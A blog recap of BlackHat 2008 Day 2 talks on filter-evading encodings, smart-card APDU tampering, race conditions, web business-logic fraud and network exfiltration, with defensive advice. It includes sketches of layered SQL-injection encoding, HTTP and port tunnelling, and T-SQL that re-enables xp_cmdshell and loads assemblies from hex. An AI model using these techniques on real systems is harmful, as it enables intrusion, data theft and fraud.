BlackHat 2008, Day 2

The second day of BlackHat 2008 began with a keynote speech by Rod Beckstrom, the director of NCSC (the National Cyber Security Center.) Most of this consisted of painfully strained Civil War analogies and the overuse of the word “Cyber” to describe absolutely everything. He made some good points — specifically, that in order to truly solve information (er, “Cyber”) security problems, we have to know the desired end state, which is more than just fixing the exploits or vulnerabilities of the week. We don’t even fully understand the physics and economics of networks, security, and risk management. The economics of security has to be based on risk management — if the marginal cost of a security measure exceeds the marginal loss it prevents, it’s counterproductive (something the government often seems to miss when it comes to “national security” anti-terrorism measures.) He seemed overly worried about the IP protocol stack as a single point of failure, and wants to keep it out of the systems it’s currently out of (say, SMS, which works even when most of the cell network is down.) I find this overly alarmist, mainly because the IP stack has been constantly attacked and exhaustively examined for nearly thirty years, and even the hackers have pretty much given up on this sort of attack. Yes, a successful exploit of the IP stack that let you, say, reroute, modify, or destroy traffic would be catastrophic on the same scale as Kaminsky’s DNS attacks of the last month, but so would an asteroid strike — the potential impact is huge, but the likelihood is very low.

All that said, I wouldn’t argue for IP-izing currently-working non-IP networks like SMS, either. There’s simply no reason to.

Next, Arian Evans of WhiteHat Security spoke on web application canonicalization, encoding, and transcoding attacks. This was one of the more interesting (and personally useful) talks of the conference for me. Web application vulnerabilities fall into two categories: syntax vulnerabilities, which fork code paths (SQL injection, cross-site scripting, etc.), and semantic issues, consisting of errors in business logic. Syntax issues are normally fought with signature-based defenses like IDS/IPS, WAFs (Web Application Firewalls), and XML firewalls. However, encoding a syntax attack can let it slip right past these defenses.

Internationalized websites often require encoding and code page transitions in order to work. In addition, developers use encodings for type safety. An attacker can take advantage of these to get a syntax attack to its target:

  1. Choose a vulnerability you want to exploit (e.g. XSS, SQL Injection)
  2. Identify the parser on the target (browser, database, application, etc.)
  3. Identify the supported encodings, codepages, and character sets on the target
  4. Identify intermediate interpreters between you and the target that canonicalize alternative encodings, such as web browsers, web application firewalls, proxies, or other applications
  5. Encode your attack such that it will be parsed in the desired way by the target after being canonicalized by all the intermediaries

This results in complex nested encodings, such as encoding SQL with the CHAR/CHR functions, then decimal encoding that, then URI encoding that result. The resultant mess goes right past IDS/IPS, but each interpreter strips off a layer of encoding, and when the payload finally reaches the target, it is interpreted properly and works. More sophisticated, internationalized apps are often easier to hit, because you have more options for submitting metacharacters encoded in another codepage that are later transcoded by the application.
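
A minimal Python sketch of this layering (the injection fragment and the filter behavior are hypothetical): each wrapper is one layer that some intermediary will strip off before handing the payload to the next parser.

```python
from urllib.parse import quote, unquote

def sql_char_encode(s):
    # Layer 1: rewrite a string as a SQL CHAR() concatenation,
    # e.g. "OR" -> CHAR(79)+CHAR(82), so no quote characters appear
    return "+".join(f"CHAR({ord(c)})" for c in s)

payload = "OR 1=1"                 # hypothetical injection fragment
layer1 = sql_char_encode(payload)  # decoded by the database
layer2 = quote(layer1, safe="")    # Layer 2: URI-encoded for the web app
layer3 = quote(layer2, safe="")    # Layer 3: double-encoded for a proxy
                                   # that decodes once before forwarding

# Each intermediary strips one layer; the database ends up with the
# CHAR() form, which a signature looking for quotes never matched
assert unquote(unquote(layer3)) == layer1
```

The same pattern works with decimal character references or codepage transitions in place of URI encoding; the point is only that the layers unwrap in the order the intermediaries canonicalize them.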

The solutions offered for this were the usual — strong data typing, strong output encoding (to prevent XSS), and enforcing the code/data boundary whenever possible (which isn’t often when it comes to web apps.) Still, this is very good stuff for demonstrating a SQL injection or XSS vulnerability to a business manager who insists that it’s not really exploitable.

Next, Ivan Buetler gave a presentation on smart cards, specifically the security of APDU, the Application Protocol Data Unit. Smart cards are mass-produced by a few companies, then sent out to companies or agencies that want to use them for security. The buyer initializes them with software and policy, then gives them to a user, who personalizes them with specific keys (often under the guidance of their employer.) Software from the manufacturer can be used to initialize or personalize cards. This demo used the Axalto Access Client, specifically the COVE and CMS administration tools.

The card itself enforces PIN policies and (sometimes) generates keys. During initialization, applets (written in Java and converted to a smart card bytecode) are uploaded to the card to add functionality. The upload, and all communication with the card, is done in APDU codes. These are laid out in the ISO 7816 specification, but there are many vendor extensions, which tend to be poorly documented — so many that the ISO spec is almost useless for reading APDUs. However, the command structure is simple — a command consists of a class byte, an instruction byte, two 1-byte parameters, a data length, and a variable-length data field (and of course a checksum.) Ivan used an app called Smart Card Toolkit Pro 13.4.2 (I can find no reference to it on the Internet other than offers to pirate or crack it) to sniff the communication with the cards and read the APDUs. He also developed his own tools to hook winscard.dll so as to add himself to the stream as a man in the middle and be able to modify APDUs (and thus send arbitrary commands to the card.)
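
As a rough illustration of that structure, a short-form command APDU can be built and parsed in a few lines of Python (the checksum sits at the transport layer and isn't shown; the SELECT example uses the standard master-file identifier 3F00):

```python
import struct

def build_apdu(cla, ins, p1, p2, data=b""):
    # Short-form command APDU per ISO 7816-4: CLA INS P1 P2 [Lc DATA]
    header = struct.pack("BBBB", cla, ins, p1, p2)
    return header + bytes([len(data)]) + data if data else header

def parse_apdu(raw):
    # Invert build_apdu: fixed 4-byte header, then Lc-prefixed data
    return {"cla": raw[0], "ins": raw[1], "p1": raw[2], "p2": raw[3],
            "data": raw[5:5 + raw[4]] if len(raw) > 4 else b""}

# SELECT (INS 0xA4) of the master file by its standard identifier 3F00
select_mf = build_apdu(0x00, 0xA4, 0x00, 0x00, bytes.fromhex("3F00"))
```

A man-in-the-middle hook like the winscard.dll one described above would parse each command this way, tweak the fields of interest, and re-emit it.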

This revealed some significant vulnerabilities. For instance, during initialization, a card can be set to either generate its own keys, or to accept keys being uploaded as-is. However, this is “enforced” by the card later telling the personalization software that it would like to generate its own keys. It’s a classic trusted-client scenario; if you modify the APDUs, the application can be convinced to ignore the card’s settings, and the card takes whatever the app sends. Lacking any APDU documentation, Ivan was only able to find a few settings like this, but if the designers of the Axalto smart card system think that’s an acceptable practice, there are probably many more.

Scott Stender of iSec Partners spoke next, about concurrency attacks in web applications. This started out with an explanation of multiprocessing (in short, on any given core, two things that execute “simultaneously” don’t really — they alternate really fast, which means that they do execute in an order, and you can’t always predict what that order is.) This would have been a more interesting talk to me had I not spent years debugging crazy stress and performance issues in the past — I’m quite familiar with concurrency and race conditions.

With web applications, web app frameworks like .NET and Java Struts define an interface that contains request context (e.g. cookies, local variables, session variables.) Access to shared resources needs to be protected, but since web access is asynchronous, threads sometimes find themselves working with dirty or stale data. The classic example is a bank – imagine a money transfer process like this:

  1. Collect source account number, destination account number, source account balance, destination account balance, and amount to transfer.
  2. Verify that the source account balance exceeds the amount to transfer.
  3. Set the destination account balance to its former balance plus the amount transferred, and set the source account balance to its former balance minus the amount transferred.

Seems perfectly sane. Now imagine that I put in a request to transfer my entire balance, then while that request is between steps 2 and 3, I start another request to transfer my entire balance, and it completes steps 1 and 2 before the first request resumes at 3. With multiprocessing this is quite possible — and it would result in my transferring twice as much money as I have (and likely without even having a negative source account balance.)
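
The interleaving is easy to reproduce deterministically. A Python sketch (all values hypothetical; the destination is treated as another bank, so the money actually leaves) that models both requests passing step 2 before either performs step 3:

```python
# Deterministic model of the race: both requests read the balance and
# pass the check (steps 1-2) before either one commits (step 3).
accounts = {"src": 100}
sent_to_other_bank = 0

def begin_transfer(amount):
    snapshot = accounts["src"]     # step 1: read the balance
    assert snapshot >= amount      # step 2: check against the snapshot
    return snapshot

def commit_transfer(snapshot, amount):
    global sent_to_other_bank
    sent_to_other_bank += amount            # the transfer goes out
    accounts["src"] = snapshot - amount     # step 3: write from stale data

a = begin_transfer(100)   # request A: steps 1-2
b = begin_transfer(100)   # request B: steps 1-2, before A commits
commit_transfer(a, 100)   # request A: step 3
commit_transfer(b, 100)   # request B: step 3, using its stale snapshot

# 200 was transferred out, yet the recorded balance is a clean 0, not -100
```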

Concurrency flaws allow manipulating stateful assets (like the above bank accounts) or changing security parameters (like auth credentials or single-use redemption tokens such as gift certificate codes.)

The solution is well-established in the database world — transactions. Transactions are atomic, consistent, isolated, and durable (the so-called “ACID” properties) — a transaction succeeds or fails as a single unit (no part of it happens unless all of it happens), and none of the resources in a transaction may be touched until the transaction is complete. Web apps can implement their own transactions, or use the transactional support of their underlying database architecture. The important part is that there is some kind of end-to-end scoped lock (and global locks — that is, eliminating multiprocessing altogether and just doing one thing at a time — are both impractical for performance and prone to deadlocks.)
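
In a real web app you'd lean on the database's transaction support, but the essence of the fix, an end-to-end scoped lock around the check and the update together, can be sketched in Python (values hypothetical):

```python
import threading

# The critical section covers the whole logical transfer: no request
# can interleave between the balance check and the balance write.
accounts = {"src": 100}
sent = 0
transfer_lock = threading.Lock()
results = []

def transfer(amount):
    global sent
    with transfer_lock:            # scoped, end-to-end
        if accounts["src"] < amount:
            results.append(False)  # the whole unit fails together
            return
        accounts["src"] -= amount
        sent += amount
        results.append(True)

# Two concurrent "requests" for the entire balance: only one can succeed
threads = [threading.Thread(target=transfer, args=(100,)) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```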

Concurrency flaws can be found in testing pretty easily — run load/stress tests and check for discrepancies afterwards. Usually something will show up. You can also add test hooks that encourage context changes to increase the likelihood of finding something. Scott also promised to upload his own tool, SyncTest, here in the coming weeks.

Jeremiah Grossman and Arian Evans also presented “Making Money on the Web the Black Hat Way.” This was all about business logic flaws, and the way they’ve been exploited to help underhanded people make tons of money without exploiting traditional “bugs” at all. These included:

  1. Creating artificial scarcity in ticket sales for events via denial of service. When you consider purchasing tickets, the site “reserves” them for a short time until you choose to purchase or not. Since it costs nothing to reserve tickets for a few minutes… one person can reserve a lot of tickets.
  2. Breaking CAPTCHAs for spammers. Some have terribly flawed implementations (e.g. the correct answer in a hidden field, or the image name), while others can be recognized by OCR software. Keep in mind that if OCR can read the CAPTCHA even 10% of the time, it’s “broken” — and it’s hard to make something that a computer can’t read even one time in ten that a human can still read. Also, there’s the Mechanical Turk solution — disguise CAPTCHA-solving as a “game” (usually one with porn as a prize) or just pay people overseas to solve them at low rates.
  3. Various overseas companies offer “password recovery” services that will tell you “your” password for a small fee, usually $30-$150. Basically, they just guess those horrible cognitive password questions (“What was your first car? Who was your favorite teacher?”)
  4. Coupon fraud. Electronic coupons sometimes have predictable numbers, and some offers allow many coupons per order. Some people have bought over $150,000 of stuff with these coupons.
  5. Gaming micro-deposits. When you set up an electronic transfer, the bank will sometimes send you a small deposit (less than $1); you then tell them the amount to verify account ownership. Michael Largent opened 58,000 brokerage accounts and collected these payments. It’s not illegal under any normal financial law — the bank is sending you a gift. However, he got charged under the USA PATRIOT Act for using fake names (58,000 of them.) This is a really dubious charge (who uses a fake name on the Internet? Oh, that’s right, everybody), but that’s par for the course in Federal law.
  6. Application service provider bank robbery. Small banks don’t really make and run their own web sites — they buy a standard “banking product” from an application service provider. Some of these are really, really bad — the example one Grossman showed had no authorization. Once you logged in as a user, you could transfer money to and from any user so long as you knew the right account numbers (which other bugs in the site were very helpful in providing to you.) Crack an ASP, and you don’t just get to rob a bank, you get to rob many banks.
  7. Slow order cancellation. QVC, the popular shopping channel, was apparently not very good at canceling orders. One woman started to order something, then canceled the order at the last step, and received the order anyway. Finding this interesting, she tried it again. And again, and again, until she’d received $412,000 in QVC merchandise and sold it on eBay. According to law, if you are sent merchandise you did not order you’re entitled to keep it as a free gift. She’d probably have been able to keep doing it for years, too, if QVC hadn’t caught on because she sold the items on eBay still in their QVC packaging. Ah, criminals are always so entertaining.
  8. Affiliate scams. People take advantage of affiliate offers in a host of ways. The most common are cookie-stuffing methods — rather than getting people to click links to affiliate sites like they’re supposed to, sneaky affiliates will embed links to the affiliate sites (often dozens or hundreds of offers) in IMG or IFRAME tags. Now whenever someone buys anything online the affiliate gets a check. They avoid referrer fields with SSL pages (or META REFRESH, or several other techniques.) Some get much more devious, with DNS rebinding, GIFAR, Flash malware, or other techniques. However, the affiliate networks can catch all this, because people sent to affiliate sites by such scams convert at a much lower rate (nearly zero) than those who clicked through to the site on purpose. This said, while people are caught constantly, apparently there is no evidence that anyone has ever been sued or charged over this sort of activity — it’s in a legal grey area where it’s not clear what, if anything, to charge them with.
  9. Trading on semi-public information. BusinessWire (a popular place to post press releases for business) had a forceful browsing vulnerability — press releases that had been uploaded but not officially released were stored at publicly-accessible URLs and just not linked to the home page. When someone found out, they started reading tomorrow’s news today and making stock trades on it. They made $8 million. A federal judge declared that they did not violate SEC regulations, because they had no insider privilege or fiduciary duty to the company — they were trading on nonpublic information, but no one who was forbidden to give it to them gave it to them. They could still be prosecuted for hacking, maybe (is typing a URL directly to a page and not following a link trail “hacking”?), but that’s hard to prove if you’re remotely careful — usually we catch hackers by following the money to them, Al Capone style. If the money is legal, and you have to catch them for the technical exploit, that’s hard.

The moral of the story: business logic flaws are serious money, possibly much more than the syntax flaws we spend so much time worrying about. Test everywhere, profile users, detect leaks and aberrant behavior.

The final presentation of the day that I attended was one by Marco Slaviero and Haroon Meer of SensePost on getting data out of protected networks.

Long ago, once someone compromised a machine, they could simply enable a shell on some port, then telnet in. However, firewalls stopped that, so they began to do reverse tunneling with ssh and netcat (as well as more custom software like tcpr and fport.) Outbound filtering stopped that, too, and so we got web shells — pieces of ASP/ASP.NET/PHP/whatever-the-web-server-runs code that could be uploaded into a webroot and would provide remote control facilities and file transfers. However, there are now a host of mechanisms available for tunneling data out of a compromised machine.

For one, XP’s IPv6 support can be used as a port proxy. The netsh command can set up a proxy such that one port on one (internet-accessible) machine is redirected to a different port on another (internal, behind the firewall) machine. Thus, one compromised edge machine can provide direct network access to any machine it can reach on any port. The ssh -L and -R options can be used to similar effect on UNIX hosts. This is a great reason for defense in depth — if an edge machine is owned, the firewall as a source of protection is largely eliminated.
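
Under the hood, all of these proxies are just a byte pump between two sockets. A minimal single-connection forwarder sketch in Python (netsh and ssh provide this natively; this only shows the mechanics):

```python
import socket
import threading

def pump(src, dst):
    # Copy bytes one direction until the source half-closes
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

def forward_once(listen_sock, target_addr):
    # Accept one inbound connection and splice it to the internal target,
    # the same effect as a netsh portproxy or ssh -L entry
    client, _ = listen_sock.accept()
    upstream = socket.create_connection(target_addr)
    t = threading.Thread(target=pump, args=(upstream, client), daemon=True)
    t.start()
    pump(client, upstream)
    t.join()
```

Run on a compromised edge host, anything that can reach the listening port now reaches the internal target, which is exactly why the firewall stops mattering.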

There is also DNS2TCP. If an attacker can get this onto a compromised machine, it allows full 2-way tunneling of arbitrary TCP over DNS — the one protocol that is allowed everywhere. Once again, this bypasses the firewall. SensePost also demonstrated their own app (glenn.jsp) which encoded TCP over well-formed HTTP POST via base64 encoding. This is not just sending arbitrary traffic over port 80 (where an application-layer firewall will block it) — it’s true, valid HTTP requests against a real web page on the server, tunneling arbitrary TCP.
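
A toy version of the glenn.jsp idea (the host, path, and form field name here are made up, not taken from the actual tool): wrap raw TCP bytes as the body of a syntactically valid HTTP POST, and unwrap them on the far side.

```python
import base64

def wrap_chunk(chunk, host="victim.example", path="/app/page.jsp"):
    # Client side: carry raw TCP bytes inside a well-formed HTTP POST.
    # (A real tunnel would also URL-encode the base64, since '+' and '='
    # are special characters in form bodies.)
    body = "data=" + base64.b64encode(chunk).decode()
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")

def unwrap_chunk(request):
    # Server side: recover the original bytes from the POST body
    body = request.split("\r\n\r\n", 1)[1]
    return base64.b64decode(body[len("data="):])
```

Because each chunk really is a valid request against a real page, an application-layer firewall that checks "is this proper HTTP?" passes it without complaint.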

So with an edge web server under the attacker’s control, the firewall is bypassed in several ways, and your network is open to the attacker. But what if the attacker uses SQL Injection to get in? Then instead of a web server, they have a back-end SQL server with (hopefully) no access to the Internet, and thus no way to upload DNS2TCP or reach glenn.jsp. Well, it turns out that there are other ways that operate only on SQL.

Squeeza is an advanced SQL Injection tool. It separates content generation from return channel — you can have it return output via HTTP errors, via DNS tunneling (entirely in SQL!), or even via a blind timing channel (which is hideously slow — over a hundred milliseconds per bit — but works.) You can send all sorts of content through it — profile the version of the server, use existing OLE objects on the server in the server’s context (such as to write a working portscanner entirely in SQL), or (in many cases) take control of the machine.
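
The blind timing channel reduces to thresholding response times, one bit per query. A toy Python model (the secret byte and the timings are invented; in SQL Server the delay would come from something like WAITFOR DELAY, and no real server is involved here):

```python
# The injected query stalls when the targeted bit of a secret is 1,
# and the attacker recovers the bit from the response time alone.
SECRET = 0b10110010  # a hypothetical byte sitting in the database

def response_time_ms(bit_index, slow_ms=150, fast_ms=5):
    # Stand-in for the server: respond slowly iff the selected bit is set
    bit = (SECRET >> bit_index) & 1
    return slow_ms if bit else fast_ms

def leak_byte(threshold_ms=75):
    value = 0
    for i in range(8):
        if response_time_ms(i) > threshold_ms:  # "slow" means bit = 1
            value |= 1 << i
    return value
```

At over a hundred milliseconds per bit, a single byte costs on the order of a second, which is why this is the return channel of last resort.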

SQL Server 2005 was the first SDL-developed version of SQL Server, and was intended to be far more secure by default than previous versions of SQL Server (which had over 1,000 stored procs enabled by default.) However, SQL Server is by its nature very hard to secure — it is very public, very capable, and highly targeted. What’s more, new features sell while better security doesn’t — so while most things are disabled by default, SQL 2005 has more “things” than ever before.

The downfall of a compromised SQL Server is in-band signaling. SQL Server’s configuration is controlled by stored procedures within SQL Server — so if you’ve gained sa access on a SQL Server, you can just turn all the disabled services back on. This includes the dreaded xp_cmdshell stored procedure (which runs shell commands as the server.) Using the new web service integration, you can write new SOAP endpoints entirely within SQL and place them on arbitrary ports — enable batch mode on those endpoints and they’ll allow running arbitrary SQL (thus getting you out of having to tunnel over DNS or use blind timing to get data out.) And if you enable the CLR, you can run arbitrary .NET code in the server (subject to CAS restrictions — unless you’re running as sa, in which case there are no restrictions at all.)
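
For the in-band-signaling point specifically: the standard sp_configure sequence for turning xp_cmdshell back on fits in four statements. They're held in a Python string here only because they'd be delivered over whatever SQL channel the attacker already has:

```python
# With sa rights, the same channel used for the injection re-enables the
# disabled features; these are the documented sp_configure steps for
# turning xp_cmdshell back on in SQL Server 2005.
REENABLE_XP_CMDSHELL = """\
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
"""

# Split into individual statements, as an injection tool would send them
statements = [s.strip() for s in REENABLE_XP_CMDSHELL.split(";") if s.strip()]
```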

There are several interesting ways to get your arbitrary .NET apps onto the server. You can order the server to load them directly from a UNC path — if the server has outbound access to your server, which is unlikely. However, you can write SQL that creates the assembly in memory from raw hex and loads it. You leave no trace on the disk, and run arbitrary code.
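
The fileless load uses CREATE ASSEMBLY with an inline hex literal, a documented (if obscure) form of the statement. A hypothetical helper that emits it from raw assembly bytes:

```python
def create_assembly_sql(name, dll_bytes):
    # Emit T-SQL that loads a .NET assembly from an inline hex literal,
    # leaving nothing on disk (the assembly name is hypothetical)
    hex_blob = "0x" + dll_bytes.hex().upper()
    return (f"CREATE ASSEMBLY [{name}] FROM {hex_blob} "
            "WITH PERMISSION_SET = UNSAFE;")

# A real payload would be the bytes of a compiled .NET DLL; "MZ" here
# just stands in for the start of the PE header
stub = create_assembly_sql("demo", b"MZ\x90\x00")
```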

What all of this really tells you, from a defender’s perspective, is the importance of defense in depth. A compromise of either the web server or the database server essentially takes down the firewall from the attacker’s perspective — they can reach anything the server can, and can run port sweeps to find out what’s within reach. Thus, it’s vital to do several things:

  1. Run the web server and database server with least privilege. The attacker can’t get more access than the servers themselves have — both services should be running with only the minimal privilege required to perform their function. Web servers should only have access to the web root — and most importantly, only read access. Databases should never be accessed as sa — only as an account with execute access to needed stored procs and select access to needed tables. Don’t let the application INSERT or UPDATE tables directly — use stored procs for that.
  2. Segment your network securely. The web server shouldn’t be able to hit any IPs or ports that it doesn’t actually need to hit to serve web pages. Likewise with the database server. Both inbound and outbound filtering is important.

Overall, it was a great conference, and there was a lot of good information handed out.  I’ll be posting a recap of DefCon 16 over the next few days as well (once I have a chance to boil a notebook full of notes down to an intelligible post.)

